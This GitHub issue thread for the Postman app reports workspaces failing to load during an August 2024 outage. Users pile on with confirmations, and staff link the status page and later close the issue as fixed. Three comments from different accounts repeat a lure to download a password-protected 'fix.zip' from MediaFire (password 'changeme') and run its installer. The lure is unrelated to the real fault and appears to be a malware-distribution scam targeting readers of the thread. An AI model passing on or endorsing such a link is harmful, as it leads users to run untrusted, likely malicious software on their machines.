### ISSUE TITLE
Couldn't load the workspaces

### ISSUE THREAD

**Issue by annemiekdehaan** [a85/POSTMan-Chrome-Extension#13093]
### Is there an existing issue for this?

- [X] I have searched the tracker for existing similar issues and I know that duplicates will be closed

### Describe the Issue

Couldn't load the workspaces

### Steps To Reproduce

1. open postman
2. click on workspaces

### Screenshots or Videos

<img width="1411" alt="Screenshot 2024-08-26 at 11 59 31" src="https://github.com/user-attachments/assets/96e4717f-a8af-4033-93d0-bb9effa21b81">

### Operating System

macOS

### Postman Version

11.9.2

### Postman Platform

Postman App
Postman Web

### User Account Type

Signed In User

### Additional Context?

Same issue for many other colleagues here, also outside of our workspaces.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Abdulrahman-Khattab** [comment]
I have same issue as well

**Comment by marcorosetti** [comment]
Same issue, both in Desktop and Web app

**Comment by sodaubai** [comment]
I got the same issue

**Comment by NsovoMash** [comment]
Same Issue, also both desktop and web app. I tried restarting my PC, running postman with admin privileges, checking for updates none of the steps worked. Just when the work is due...

**Comment by FerandDalatieh** [comment]
same here.

However, if I use an old desktop version (e.g. Version 8.12.7), everything runs correctly there.

**Comment by horialex** [comment]
Same problem here

**Comment by voutsasva** [comment]
Same issue

**Comment by junaidpicku** [comment]
same issue with me too

**Comment by annemiekdehaan** [comment]
It is recognised. 

[Workspaces are not loading](https://status.postman.com/incidents/gcvjzq2dpf23)(https://status.postman.com/#subscribe-modal-gcvjzq2dpf23)
Investigating - Investigating degraded performance for workspaces. We will continue to post frequent updates to indicate investigation progress.
Aug 26, 2024 - 10:08 UTC

**Comment by Kyubendo** [comment]
Same. I think it's time to start using the alternatives. Such issues are just unacceptable

**Comment by yasincandev** [comment]
same issue v10.24.27
OS Platfrom : linux 6.8.0-40-generic

**Comment by incognito243** [comment]
same issue

**Comment by kevzlou7979** [comment]
Same issue

**Comment by JoseRPGMoncho** [comment]
Same here

**Comment by ievrbgh** [comment]
+1

**Comment by mak-S1x** [comment]
+1

**Comment by mak-S1x** [comment]
+1

**Comment by mak-S1x** [comment]
+1

**Comment by MucahidAydin** [comment]
+1

**Comment by ankitagarwal6899** [comment]
+1

**Comment by nenuetoneflex** [comment]
Русские на месте?

**Comment by cmenet-betclic** [comment]
Same issue here, Windows version 11.9.2

**Comment by honeyreoss** [comment]
я уж подумал санкции опять...

**Comment by nenuetoneflex** [comment]
> я уж подумал санкции опять...

Не, санкции будут 12го сентября

**Comment by DeBug-Bug** [comment]
+1

**Comment by BountyHanter** [comment]
> я уж подумал санкции опять...

Ты че без впн? Я думал из за впн ничего не работает а оказалось нет

**Comment by BountyHanter** [comment]
Как же вовремя оно навернулось... мне щас надо апи щупать а оно не работает... прийдётся вручную писать запросы

**Comment by Ekzekutive** [comment]
> > я уж подумал санкции опять...
> 
> Не, санкции будут 12го сентября

а что за санкции будут 12 сентября?

**Comment by honeyreoss** [comment]
> Как же вовремя оно навернулось... мне щас надо апи щупать а оно не работает... прийдётся вручную писать запросы

сваггер :skull:

**Comment by BountyHanter** [comment]
> > > я уж подумал санкции опять...
> > 
> > 
> > Не, санкции будут 12го сентября
> 
> а что за санкции будут 12 сентября?

Запретят какать

**Comment by AbrorbekQB** [comment]
I haven't looked for a postman alternative until this issue. ApiDog

**Comment by kxnvg** [comment]
У меня такая же проблема

**Comment by Dolen-Chalgar** [comment]
Тествайте си нещата преди да осерете продъкшан!

**Comment by vladi14** [comment]
same here

**Comment by Nasgo-ya** [comment]
Same here ☹️

**Comment by canan8** [comment]
I have the same problem

**Comment by sony-mathew** [comment]
Hey folks, we are working on this issue. Please follow the status of the incident [here](https://status.postman.com/incidents/gcvjzq2dpf23).

**Comment by devSahinur** [comment]
I have also same issue

**Comment by ssagarsag1996** [comment]
iam also facing the same issue
![image](https://github.com/user-attachments/assets/29841538-2789-45cd-9861-66a44c4e86b7)

**Comment by campioncino** [comment]
the same +1

**Comment by shadat-hossan** [comment]
Hello,

I am experiencing the same issue as described in Issue **#13093** on GitHub. Specifically, the Postman application is not responding as expected, and I'm encountering similar problems with the app’s functionality.

Could you please provide guidance on how to resolve this issue or let me know if there is an update on the status of this problem?

Thank you for your assistance.

Best regards,
_shadat-hossan_

**Comment by Gbahdeyboh** [comment]
Hi Everyone 👋,

We’re currently experiencing some issues with our internal services that are impacting the performance of Workspaces. We recognize how disruptive this is and sincerely apologize for any inconvenience it may be causing.

Our team has identified the root cause and is working urgently to resolve the issue. Rest assured, this is a top priority for us, and we’re focused on restoring full functionality as quickly as possible.

For real-time updates, please follow our status page [here](https://status.postman.com/). You can also subscribe to receive notifications as soon as the issue is resolved.

Thank you for your patience and understanding.

**Comment by abdessalemgh** [comment]
Same here +1

**Comment by voutsasva** [comment]
Fixed!

**Comment by devSahinur** [comment]
Yes Fixed!

**Comment by BountyHanter** [comment]
Найс, починили, правда мне уже не нужно я вручную все сделал XD

**Comment by abdessalemgh** [comment]
it works

**Comment by cmenet-betclic** [comment]
Thanks the team, works fine now!

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nenuetoneflex** [comment]
> > > я уж подумал санкции опять...
> > 
> > 
> > Не, санкции будут 12го сентября
> 
> а что за санкции будут 12 сентября?

Американские)))))

**Comment by AkashRajpurohit** [comment]
This has been fixed. Closing this.
cc: @akshay-kulkarni-03

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nenuetoneflex** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

и что это?

**Comment by payalagarwal-jade** [comment]
+1 same issue

**Comment by junaidpicku** [comment]
same issue
________________________________

**Comment by duncan-iaria** [comment]
this seems to still be an issue for me.

**Comment by junaidpicku** [comment]
Even its still same for mee.. Its too irritating from yetaday...
________________________________

**Comment by Demaxl** [comment]
Hello, this is still not working for me

**Comment by Demaxl** [comment]
> Hello, this is still not working for me

It worked after sign out then signing in again
